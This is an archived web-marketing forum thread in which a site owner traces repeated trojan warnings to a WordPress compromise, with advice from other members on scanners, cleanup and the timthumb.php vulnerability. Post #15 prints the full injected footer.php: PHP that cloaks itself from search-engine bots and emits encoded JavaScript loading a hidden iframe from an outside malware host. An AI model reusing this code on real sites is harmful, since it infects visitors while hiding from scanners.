Jump to content

Cre8asiteforums Internet Marketing
and Conversion Web Design


Photo

My Site Is Throwing Virus Warnings. :(


  • Please log in to reply
42 replies to this topic

#1 Dr.Marie

Dr.Marie

    Light Speed Member

  • Invited Users For Labs
  • 582 posts

Posted 30 March 2012 - 05:19 PM

I've had a few of my Facebook fans tell me that when they click on links to my site that their virus checker is giving them a trojan warning.

A few months ago I found someone had planted malicious code in my header and changed my .htaccess. I'm certain I've cleaned it all.

I have a couple of theories:

1. It's possible that during the 12 hours or so that the virus was there previously, my site got picked up by virus checking companies and is on a list as suspicious. If so, how do I get off of a list?

2. Perhaps another site on my shared hosting plan has a virus and as such my ip is flagged as suspicious? If this is the case, this should be cleared up shortly as I am migrating to a new host soon.

3. Perhaps there still is a virus present. Is there any way I can check for one?

I greatly appreciate any thoughts you guys have!

Marie

#2 DonnaFontenot

DonnaFontenot

    Peacekeeper Administrator

  • Site Administrators
  • 3803 posts

Posted 30 March 2012 - 05:43 PM

Have you checked Webmaster tools for any notifications? Or used the Fetch as Googlebot feature there to see if it's showing spammy stuff to Googlebot only?

#3 Dr.Marie

Dr.Marie

    Light Speed Member

  • Invited Users For Labs
  • 582 posts

Posted 31 March 2012 - 12:52 PM

Thanks Donna...I have no warnings in WMT. I fetched as Googlebot and nothing looks fishy. I can account for every line of code on the page.

Grrr...

#4 DonnaFontenot

DonnaFontenot

    Peacekeeper Administrator

  • Site Administrators
  • 3803 posts

Posted 31 March 2012 - 03:57 PM

Looks ok here: http://www.google.co...vetquestion.com

Ok here: http://safeweb.norton.com/

Ok here: http://www.avg.com.a...b-page-scanner/

#5 Dr.Marie

Dr.Marie

    Light Speed Member

  • Invited Users For Labs
  • 582 posts

Posted 31 March 2012 - 07:29 PM

Thanks so much Donna. I appreciate you taking the time to help!

I really think that the people who are getting warnings have not updated their virus definitions. An article of mine was just posted on a major veterinary board and someone commented saying, "Don't click! Avast says the site has a Trojan!" The next person responded saying they had Avast 2012 and got no warning.

#6 DonnaFontenot

DonnaFontenot

    Peacekeeper Administrator

  • Site Administrators
  • 3803 posts

Posted 01 April 2012 - 08:41 AM

I think you're right or at least somewhat on the right track. It's bound to be some residual effect from the previous problem. I don't know what the solution is. I guess I'd probably try to find out if there is a blacklist out there that the site is on, but I don't know how to find it.

#7 DonnaFontenot

DonnaFontenot

    Peacekeeper Administrator

  • Site Administrators
  • 3803 posts

Posted 01 April 2012 - 08:50 AM

Hmmm...wait a second. This test does say it has malware: http://sitecheck.sucuri.net/scanner/

It's questioning a script on aboutus.php and question_list.php - which contains a url pointing to frankwscanoes [dot] somethingorother

Please don't attempt to go to that site as it is likely ready to infect computers. I've purposely made it non clickable and changed the bit following the dot (which is not com).

You may indeed have an issue.

#8 Dr.Marie

Dr.Marie

    Light Speed Member

  • Invited Users For Labs
  • 582 posts

Posted 01 April 2012 - 05:50 PM

What the? Thanks again Donna. I've been getting calls all day from people saying, "I tried to read your article but my antivirus says there is a trojan."

I'm lost as to what to do now. I don't see that code anywhere on my site.

#9 DonnaFontenot

DonnaFontenot

    Peacekeeper Administrator

  • Site Administrators
  • 3803 posts

Posted 01 April 2012 - 06:14 PM

I assume you also checked the database? And looked for encrypted code?

#10 Dr.Marie

Dr.Marie

    Light Speed Member

  • Invited Users For Labs
  • 582 posts

Posted 01 April 2012 - 06:17 PM

That is a good point. If the bad code was in my database this could explain why the virus message comes up sporadically because my database randomly chooses questions to display on the page.

I'm not sure how to check the database for viruses. I will investigate though.

Donna...do you think this is something you could flesh out for me? I'm quite willing to pay you for your service!

#11 Dr.Marie

Dr.Marie

    Light Speed Member

  • Invited Users For Labs
  • 582 posts

Posted 01 April 2012 - 07:15 PM

Donna, that site, sucuri.net offers cleanup and monitoring for further viruses for $90. I'm thinking I'm going to do that unless you feel that you (or I) can do it. Thanks!

#12 DonnaFontenot

DonnaFontenot

    Peacekeeper Administrator

  • Site Administrators
  • 3803 posts

Posted 01 April 2012 - 09:49 PM

Oh I definitely won't tackle that. My best buddy Michael cleans sites for a living, so I know how complex it can be to make sure everything gets uncovered. I'd not want to miss anything. He does, however, list some sql statements you can run in his cleaning post - http://smackdown.blo...s-installation/ So you might want to run those first.

#13 Michael_Martinez

Michael_Martinez

    Time Traveler Member

  • 1000 Post Club
  • 1354 posts

Posted 02 April 2012 - 04:59 AM

Marie, make sure you're logged out when you try to check your pages for malware warnings. I have read that some trojans are clever enough to hide themselves from logged in admins.

#14 glyn

glyn

    Sonic Boom Member

  • Hall Of Fame
  • 2524 posts

Posted 02 April 2012 - 06:06 AM

IS THIS A WP site?

#15 Dr.Marie

Dr.Marie

    Light Speed Member

  • Invited Users For Labs
  • 582 posts

Posted 02 April 2012 - 08:16 PM

Good news! The problem is fixed!

I contacted my host and they were able to see and remove the malicious code.

If you are interested, here is what happened. There was a file called footer.php that was inserted in a directory. The directory was one that is used to host files that do calculations for a tool that I created. There should not have been a footer.php in that directory. Here is the file:

<?php

error_reporting(0);
$bot_ips = array("8.6.48","62.172.199","62.27.59","63.163.102","64.157.137","64.157.138","64.233.173","64.68.80","64.68.81","64.68.82","64.68.83","64.68.84","64.68.85","64.68.86","64.68.87","64.68.88","64.68.89","64.68.90","64.68.91","64.68.92","64.75.36","66.163.170","66.163.174","66.196.101","66.196.65","66.196.67","66.196.72","66.196.73","66.196.74","66.196.77","66.196.78","66.196.80","66.196.81","66.196.90","66.196.91","66.196.92","66.196.93","66.196.97","66.196.99","66.218.65","66.218.70","66.228.164","66.228.165","66.228.166","66.228.173","66.228.182","66.249.64","66.249.65","66.249.66","66.249.67","66.249.68","66.249.69","66.249.70","66.249.71","66.249.72","66.249.73","66.249.78","66.249.79","66.94.230","66.94.232","66.94.233","66.94.238","67.195.115","67.195.34","67.195.37","67.195.44","67.195.45","67.195.50","67.195.51","67.195.52","67.195.53","67.195.54","67.195.58","67.195.98","68.142.195","68.142.203","68.142.211","68.142.212","68.142.230","68.142.231","68.142.240","68.142.246","68.142.249","68.142.250","68.142.251","68.180.216","68.180.250","68.180.251","69.147.79","72.14.199","72.30.101","72.30.102","72.30.103","72.30.104","72.30.107","72.30.110","72.30.111","72.30.124","72.30.128","72.30.129","72.30.131","72.30.132","72.30.133","72.30.134","72.30.135","72.30.142","72.30.161","72.30.177","72.30.179","72.30.213","72.30.214","72.30.215","72.30.216","72.30.221","72.30.226","72.30.252","72.30.54","72.30.56","72.30.60","72.30.61","72.30.65","72.30.78","72.30.79","72.30.81","72.30.87","72.30.9","72.30.97","72.30.98","72.30.99","74.6.11","74.6.12","74.6.13","74.6.131","74.6.16","74.6.17","74.6.18","74.6.19","74.6.20","74.6.21","74.6.22","74.6.23","74.6.24","74.6.240","74.6.25","74.6.26","74.6.27","74.6.28","74.6.29","74.6.30","74.6.31","74.6.65","74.6.66","74.6.67","74.6.68","74.6.69","74.6.7","74.6.70","74.6.71","74.6.72","74.6.73","74.6.74","74.6.75","74.6.76","74.6.79","74.6.8","74.6.85","74.6.86","74.6.87","74.6.9","74.55.27","141.185.209","169.207.238","199.177.18","202.160.178","202.160.179","202.160.180","202.160.181","202.160.183","202.160.185","202.165.96","202.165.98","202.165.99","202.212.5","202.46.19","203.123.188","203.141.52","203.255.234","206.190.43","207.126.239","209.1.12","209.1.13","209.1.32","209.1.38","209.131.40","209.131.41","209.131.48","209.131.49","209.131.50","209.131.51","209.131.60","209.131.62","209.185.108","209.185.122","209.185.141","209.185.143","209.185.253","209.191.123","209.191.64","209.191.65","209.191.82","209.191.83","209.67.206","209.73.176","209.85.238","211.14.8","211.169.241","213.216.143","216.109.121","216.109.126","216.136.233","216.145.58","216.155.198","216.155.200","216.155.202","216.155.204","216.239.193","216.239.33","216.239.37","216.239.39","216.239.41","216.239.45","216.239.46","216.239.51","216.239.53","216.239.57","216.239.59","216.32.237","216.33.229","174.129.130", "94.75.242", "74.55.27");
$bot_agents = array('chrome', 'gtb', 'altavista', 'ask jeeves', 'bingbot', 'download master', 'google', 'php', 'httrack', 'java', 'jeeves', 'libwww-perl', 'listchecker', 'lycos', 'msiecrawler', 'msnbot', 'msnbot-media', 'netcache', 'offline explorer', 'pear', 'python', 'slurp', 'spider', 'teleport pro', 'twiceler', 'webalta', 'webcopier', 'webcrawler', 'webzip', 'wget', 'yahoo', 'yandex');
$good_agents = array('windows', 'macintosh');
$arr = explode(".", $_SERVER["REMOTE_ADDR"]);
$ip = $arr[0].".".$arr[1].".".$arr[2];
$agent = strtolower($_SERVER['HTTP_USER_AGENT']);
$BOT = false;
$c = false;
foreach ( $good_agents as $one )
{
if ( strstr($agent, $one) )
{
  $c = true;
  break;
}
}
if ( !$c )
{
$BOT = true;
}
elseif ( in_array($ip, $bot_ips) )
{
$BOT = true;
}
else
{
foreach ( $bot_agents as $one )
{
  if ( strstr($agent, $one) )
  {
   $BOT = true;
   break;
  }
}
}
$code = '%3Cscript+language%3D%27JavaScript%27%3Edocument.write%28%22%3C%22%2B%22if%22%2B%22ra%22%2B%22me%22%2B%22+src%3D%27http%3A%2F%2F%22%2B%22frankwsa%22%2B%22migos.in%22%2B%22%2Fshowads.php%3F2%26seoref%3D%22%2BencodeURIComponent%28document.referrer%29%2B%22%26HTTP_REFERER%3D%22%2BencodeURIComponent%28document.URL%29%2B%22%27+width%3D%271%27+height%3D%271%27+frameborder%3D%270%27%3E%3C%2F%22%2B%22if%22%2B%22ra%22%2B%22me%22%2B%22%3E%22%29%3B%3C%2Fscript%3E';
$code = urldecode($code);
$code2 = '<script language="JavaScript">
function SetCookie(cookieName,cookieValue,nDays) {
var today = new Date();
var expire = new Date();
if (nDays==null || nDays==0) nDays=1;
expire.setTime(today.getTime() + 3600000*24*nDays);
document.cookie = cookieName+"="+escape(cookieValue)
				 + ";expires="+expire.toGMTString()+";path=/";
}
SetCookie("bestourproxydone", "100500", 1);
</script>';
if ( !$BOT && !isset($_COOKIE['bestourproxydone']) )
{
$out = isset($code2) ? $code2."\n".$code : $code;
print $out;
}
?>

I'm guessing that what it does is hide the badness from bots. (Which is likely why my WMT didn't give me a warning.) Then, I'm guessing that what it does is show ads to the user rather than having them see my ads. Sneaky.

My host figures that when I was hacked a few months ago there was an open door that allowed the hackers to plant this code. They said it's also possible that I got infected by accessing my cpanel from an infected PC. Interestingly enough, one of our computers was severely virus infested this week. The computer tech said it was the worst they had seen and it took them 3 days to get the thing off. Who knows if the virus came from my site or if this virus actually infected my site.

I am suspicious that this started shortly after I installed my forum (which is now gone). But I guess I'll never know.

Thanks to all who tried to help!

#16 Dr.Marie

Dr.Marie

    Light Speed Member

  • Invited Users For Labs
  • 582 posts

Posted 03 April 2012 - 02:32 PM

As an interesting twist, the nasty footer.php file keeps repopulating itself. For now I have deleted it and created a new blank file called footer.php in the hopes that it will stop the virus from creating a new file. I'm waiting to see what my host says.

#17 DonnaFontenot

DonnaFontenot

    Peacekeeper Administrator

  • Site Administrators
  • 3803 posts

Posted 03 April 2012 - 04:11 PM

See, that's why I don't clean sites and don't recommend people do it themselves. A back door was left open and it will keep getting reinfected over and over and over again until all avenues are closed. I've paid attention to the many times that Michael has cleaned sites and the work involved is pretty intense, to make sure nothing is missed.

#18 Michael_Martinez

Michael_Martinez

    Time Traveler Member

  • 1000 Post Club
  • 1354 posts

Posted 03 April 2012 - 05:35 PM

If you're not supposed to have a footer.php file then there should be relatively few references to it in your library of PHP files. If you are using a Linux-based server and IF you can telnet to it and IF you know how to do that, you can probably find the script that is still corrupted by using a command line query similar to this:

grep -r 'footer.php' * > ./footer-report.txt

That would put all its results into the text file "footer-report.txt", which you could download and browse casually. Knowing where the corrupted script is would point you to which theme/plugin directory should be re-installed (or de-installed).

If you try this, be sure to check again after you re-install anything to make sure you're not just installing a corrupted package.

#19 DonnaFontenot

DonnaFontenot

    Peacekeeper Administrator

  • Site Administrators
  • 3803 posts

Posted 03 April 2012 - 07:10 PM

Except the reference might be encrypted and stored somewhere in the database, rather than in plain sight in a file.

#20 Dr.Marie

Dr.Marie

    Light Speed Member

  • Invited Users For Labs
  • 582 posts

Posted 03 April 2012 - 07:42 PM

My host has found some more corrupted files...all of these are from my wordpress blogs. I feel like a dolt because I changed all of my main passwords but didn't change my wp admin passwords. This is likely part of the problem.

The host says they are going to do a manual audit of the site to see if they can pick up any more bad stuff.

Why on earth do people create viruses like this? Ugh.

#21 DonnaFontenot

DonnaFontenot

    Peacekeeper Administrator

  • Site Administrators
  • 3803 posts

Posted 03 April 2012 - 10:49 PM

Please don't assume it's just a password. Yes, you should change those too, but I'm tellin ya...I can't stress this enough...they have numerous ways of injecting backdoors all over the place, and if you get your head set on it being "this one thing", then you're gonna miss the other ten things.

#22 Michael_Martinez

Michael_Martinez

    Time Traveler Member

  • 1000 Post Club
  • 1354 posts

Posted 03 April 2012 - 11:06 PM

Ifn't were me, I'd probably just delete everything and restore from a pre-corrupted backup. Yes, you'd lose some posts but you might be able to recover those from Google's cache.

#23 jonbey

jonbey

    Eyes Like Hawk Moderator

  • Moderators
  • 4390 posts

Posted 04 April 2012 - 01:50 PM

Or, you could copy the pages from the screen before deleting.
Or, transfer the site to a test domain before rebuilding.
Then no need to rely on Google Cache.

I had a blog on a third party site. They closed it down as I forgot to log on. I had written a few good articles and went to Google cache and it was already cleared. Google is a bit quick these days!

#24 EGOL

EGOL

    Professor

  • Hall Of Fame
  • 5416 posts

Posted 04 April 2012 - 02:10 PM

I had a problem like this on one of my previous hosts. But this was on a static site with no database, no log-in, no programs running.

When I called my host about it I learned that the backdoor was not on my website. It was on their server. The hacker got in and vandalized a lot of websites.

#25 Dr.Marie

Dr.Marie

    Light Speed Member

  • Invited Users For Labs
  • 582 posts

Posted 05 April 2012 - 08:32 AM

So EGOL, are you thinking I should change hosts? :rolleyes: :rolleyes: :rolleyes:

j/k. My host change should take place this weekend....it has taken me AGES to get my files ready.

Here's a tip for anyone self programming a static site that uses databases...use a config file and variables for your host, username, password and database name. That way if you change hosts you just have to change the config file and not every single page on your website!

#26 jsteele823

jsteele823

    Ready To Fly Member

  • Members
  • 37 posts

Posted 12 April 2012 - 01:29 PM

It could be a timthumb hack - Happened to 12 sites I work on in the last 90 days - all at separate times.

I signed up at codegarage.com and had them clean it up for me. They were able to clean up all sites (after hours and hours of my own attempts) in two hours.

Also, do a site: search of your site on Google and look for pages that shouldn't be there. They'll usually be in wp-content folders.

#27 Dr.Marie

Dr.Marie

    Light Speed Member

  • Invited Users For Labs
  • 582 posts

Posted 12 April 2012 - 01:32 PM

Good thought. The darn thing popped up again so my host went at it again and found several more files that had been planted. They feel they've cleared them now, but we'll see.

#28 DonnaFontenot

DonnaFontenot

    Peacekeeper Administrator

  • Site Administrators
  • 3803 posts

Posted 12 April 2012 - 11:18 PM

Marie, if it happens again, please, I beg you...have someone who does this thing for a living fix it. Otherwise, you're just going to keep going through this over and over and over and...well...kinda like what's already been happening. Y'all are just putting bandaids on it so far. It's not working. It's time to get real help. I think you should contact my friend Michael, but the other place you were thinking of is probably good too. Pick someone though - not the host - obviously that's not working. Just my opinion...

#29 Dr.Marie

Dr.Marie

    Light Speed Member

  • Invited Users For Labs
  • 582 posts

Posted 13 April 2012 - 06:24 AM

Thanks Donna...that is definitely the plan. The tech that I talked to at my hosting company did feel confident that he had removed all of the bad files. But, I am not naive and do understand that these viruses are nasty nasty things and very clever. If it comes back again I will definitely hire a professional.

#30 Michael_Martinez

Michael_Martinez

    Time Traveler Member

  • 1000 Post Club
  • 1354 posts

Posted 13 April 2012 - 12:48 PM

So, I DON'T deal with these things for a living but I have read that some of these things can live in your database (which is why I earlier said I would just delete everything and restore from a corrupted backup). If that is the case, you probably need to contact Donna's friend or someone who knows ALL the nooks and crannies where these things can hide.

BTW -- have you checked your personal/work computers for infections? I haven't heard of any desktop-to-server infections but you never know. I use Trend Micro's House Call when I'm not sure if a computer's anti-virus software can be trusted. You can download House Call from the Web for free each time you want to use it.

#31 jonbey

jonbey

    Eyes Like Hawk Moderator

  • Moderators
  • 4390 posts

Posted 13 April 2012 - 02:34 PM

Gumblar was a desktop to sever infection - it sniffed out FTP details then sent the detail back somewhere for people to use to infect servers. No idea how exactly it worked, but that it what happened to a friends site. Luckily it was not that clever and altered files had a date stamp. It did change a lot of strange files, usually in temp folders, log reports etc. as well as planting things like image.php in image directories - you do not see it as a strange file to start with.

#32 jonbey

jonbey

    Eyes Like Hawk Moderator

  • Moderators
  • 4390 posts

Posted 13 April 2012 - 02:40 PM

oh, and it did (does) have a habit of reinfecting sites etc.

#33 Dr.Marie

Dr.Marie

    Light Speed Member

  • Invited Users For Labs
  • 582 posts

Posted 20 April 2012 - 11:52 AM

WOW, WOW, WOW, I have an update.

After a week of being clean the darn thing came back again. I signed up for sucuri.net's $90 plan where for one year they check your site every 6 hours for malware and fix anything they find.

Within 10 minutes they had found the answer. The malware kept coming in via an outdated timthumb.php file. If you do a search for timthumb, you'll see that it's actually a well known vulnerability that gives bad guys a door to keep accessing your site.

Here's the weird thing though...I couldn't find a timthumb plugin in either of my 2 WP blogs. All of my plugins were up to date and so were my themes so I was stumped.

When I found it, I was shocked! The file was in a folder of an UNUSED theme that I had. I had a bunch of themes that I had downloaded to try when I first created my site. The files were all still there and of course they had never been updated. The nastiness came in via a free theme that I had downloaded a couple of years ago.

So, lesson learned: Don't have spare themes hanging around in Wordpress!

btw...if anyone reading this has issues with timthumb.php attacks, you can either upgrade your theme, or if that is not possible, here is a good page to explain what to do: http://www.gabfireth...-vulnerability/

#34 DonnaFontenot

DonnaFontenot

    Peacekeeper Administrator

  • Site Administrators
  • 3803 posts

Posted 20 April 2012 - 12:44 PM

Yep, jsteele mentioned the timthumb attack earlier in this thread. Glad you finally got a pro to look at it.

#35 Dr.Marie

Dr.Marie

    Light Speed Member

  • Invited Users For Labs
  • 582 posts

Posted 20 April 2012 - 12:55 PM

Yeah, I did have a look after seeing Jsteele's comment but didn't see timthumb in either of my blogs. I'm still floored that this came from an inactive folder just sitting there on my site!

#36 bobbb

bobbb

    Sonic Boom Member

  • Hall Of Fame
  • 2060 posts

Posted 01 May 2012 - 07:12 PM

I presume you also changed your FTP passwords.

#37 jonbey

jonbey

    Eyes Like Hawk Moderator

  • Moderators
  • 4390 posts

Posted 03 May 2012 - 03:27 AM

And don't do it from your normal PC.

Lots of trojans are on PCs only to sniff FTP details.

#38 jsteele823

jsteele823

    Ready To Fly Member

  • Members
  • 37 posts

Posted 03 May 2012 - 07:11 AM

Glad you got it sorted.

I've got full-time monitoring on all sites on my server now. I use Locker from Code Garage. They've caught a few since the initial attacks on sites I wasn't even paying them to look after - so I'm highly thankful to Peter and his team.

It's always best to be proactive with these sorts of things, but most people (myself included, of course) are reactive, waiting only until it happens to do anything about it.

#39 Dr.Marie

Dr.Marie

    Light Speed Member

  • Invited Users For Labs
  • 582 posts

Posted 09 May 2012 - 01:45 PM

I wanted to update this thread just in case it helps others who are going through this type of issue.

Sucuri.net worked really hard on the problem, but unfortunately it kept coming back. Their automated software kept sending me an email to say I was infected, and then I would have them take a look and each time they thought they found the answer, but it would come back again.

On the advice of Donna, I hired Michael VanDerMar to have a look. (He has given me permission to tell you guys about his work. You can contact him here if any of you ever need malware help: http://smackdown.blo...chael-vandemar/)

At first Michael had the site cleaned very quickly. But, the next day Sucuri was sending me warnings again. From Michael's side, things looked clear. I started to wonder if Sucuri's tool was buggy. But, I had a few Facebook fans complain that Avast was warning them of a virus on my site.

Sucuri suggested that the virus could be what was called conditional malware. Some of the malwares these days are configured to only display once per IP. Or, they can only appear at certain hours of the day.

I gave Michael this information and he found out that the malware was configured to only appear for users with internet explorer. Even though the virus was mostly affecting my wordpress blog, it had set up a folder outside of wordpress that it used to continually repopulate random pages of my site with malicious code.

It's been several days now and the site seems to be clear.

Why on earth do people write these nasty things?

I highly recommend Michael to anyone having malware issues. This stuff is brutal!!!

#40 bobbb

bobbb

    Sonic Boom Member

  • Hall Of Fame
  • 2060 posts

Posted 09 May 2012 - 02:36 PM

Why on earth do people write these nasty things?

That's simple. $$$
Your site was the infector. Those that are being infected will be raided for information like FTP passwords, bank stuff, your browser password file, and anything else of value.

Either the malware people use this info to propagate their "malwareness" or it can be sold to third parties.

Some of the malwares these days are configured to only display once per IP.

Yes I've read this too. And I believe they track from which infected site. Maybe they do SEO to see which site is more productive ? :)

it had set up a folder outside of wordpress that it used to continually repopulate random pages

Did Michael VanDerMar find out how the initial infection of your site occured? Finding this might be instructive. Mine was via FTP passwords.

Edited by bobbb, 09 May 2012 - 05:35 PM.




RSS Feed

0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users